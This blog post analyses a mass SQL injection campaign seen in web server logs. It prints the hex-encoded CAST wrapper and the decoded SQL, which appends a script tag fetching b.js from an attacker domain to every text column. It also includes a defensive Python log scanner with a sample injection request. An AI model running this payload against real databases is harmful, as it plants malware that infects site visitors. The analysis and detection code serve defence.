Andre's Blog
Perfection is when there is nothing left to take away
Massive SQL injection, anyone?

Last weekend I found a number of entries in the HTTP server logs indicating SQL injection attempts. The SQL targeted MS SQL Server and used the CAST function to decode a long hexadecimal sequence into executable SQL; because the hex contains no quote characters, it slips past quote-escaping code on the server side.

DECLARE @S VARCHAR(4000);
SET @S=CAST(0x4445434C4152452040542...736F7220 AS VARCHAR(4000));
EXEC(@S);

If such a sequence is appended to a non-validated numeric SQL parameter, it is expanded into the block of SQL text shown below and executed by the server. This code scans the system catalog, selects all columns containing text (text, varchar and nvarchar) and appends a script tag to the value in each one of them.

DECLARE @T VARCHAR(255),@C VARCHAR(255) 
DECLARE Table_Cursor CURSOR FOR 
   SELECT a.name,b.name 
   FROM sysobjects a,syscolumns b 
   WHERE a.id=b.id AND a.xtype='u' AND 
      (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
   BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=
      RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+
         ''<script src=http://www.adsitelo.com/b.js></script>''') 
   FETCH NEXT FROM Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

If any of the modified text was indeed HTML, it would be rendered by website visitors, forcing them to execute JavaScript from the script file (b.js) containing malicious code.
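Reversing the encoding step above is the quickest way to see what a logged request would actually run. The following Python is an added example, not code from the post: it finds the CAST(0x... AS VARCHAR(n)) idiom in web server log lines and decodes the hex back into readable SQL. The log lines and the hex value are constructed; the constructed blob decodes to the first statement of the decoded payload above, consistent with the real blob's prefix 0x4445434C415245204054, which is the hex for "DECLARE @T".

```python
import re
from urllib.parse import unquote

# The CAST(0x... AS VARCHAR(n)) idiom from the log entries. The hex blob is
# usually URL-encoded in the request line, so each line is unquoted first.
CAST_HEX = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR\(\d+\)\)", re.IGNORECASE
)

def decode_cast_payloads(log_lines):
    """Return a list of (line_number, decoded_sql) for each hex CAST payload found.

    VARCHAR blobs are single-byte text; NVARCHAR blobs are UTF-16LE, which is
    how SQL Server stores Unicode strings.
    """
    hits = []
    for number, line in enumerate(log_lines, start=1):
        for match in CAST_HEX.finditer(unquote(line)):
            hexblob, n_prefix = match.group(1), match.group(2)
            if len(hexblob) % 2:
                hexblob = hexblob[:-1]  # odd trailing nibble: drop it, decode the rest
            raw = bytes.fromhex(hexblob)
            encoding = "utf-16-le" if n_prefix else "latin-1"
            hits.append((number, raw.decode(encoding, errors="replace")))
    return hits

def is_sql_injection_probe(line):
    """True if the request line carries a hex-encoded CAST payload."""
    return bool(CAST_HEX.search(unquote(line)))

# Constructed log lines (common log format). The hex blob is a constructed
# stand-in that decodes to the opening statement of the payload in the post;
# it is not the full blob seen in the real logs.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2008:03:14:07 +0000] "GET /page.asp?id=42 HTTP/1.1" 200 5123',
    '10.0.0.9 - - [12/May/2008:03:14:09 +0000] "GET /page.asp?id=42;DECLARE%20@S%20VARCHAR(4000);'
    'SET%20@S=CAST(0x4445434C41524520405420564152434841522832353529%20AS%20VARCHAR(4000));'
    'EXEC(@S);-- HTTP/1.1" 200 5123',
    '10.0.0.7 - - [12/May/2008:03:15:22 +0000] "GET /list.asp?cat=7 HTTP/1.1" 200 2201',
]

if __name__ == "__main__":
    for number, sql in decode_cast_payloads(SAMPLE_LOG):
        print(f"line {number}: {sql}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; every hit is a request whose decoded SQL should be reviewed, and every hit against a numeric parameter is a sign that the parameter is not being validated.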

The domain names in the HTTP requests alternated between the one shown in the SQL, www.advabnr.com and www.bigadnet.com. All of these domains are registered in Beijing, China. Their domain name servers, however, belonged to Clearwire and Charter Communications.

When I looked up IP address DNS records for one of the domains, it came back with a whopping list of a dozen addresses, as if this were a major corporation:

65.26.203.88, 59.126.54.130, 202.55.166.34, 67.176.123.71, 76.185.248.10, 85.65.224.194, 65.35.89.174, 81.130.198.232, 208.107.51.92, 81.247.187.98, 75.70.182.21, 68.161.245.150, 211.3.231.32, 71.199.208.21, 82.120.66.58

Registration information for some of these addresses shows that they all belong to various ISPs, such as Road Runner, Comcast and China Telecom, which would mean that all of these machines were hacked end-user computers hosting a web server (nginx/0.5.33) for the sole purpose of serving the JavaScript file referenced in the SQL code above.

Useful Links

http://en.wikipedia.org/wiki/SQL_injection

http://msdn.microsoft.com/en-us/library/ms161953.aspx
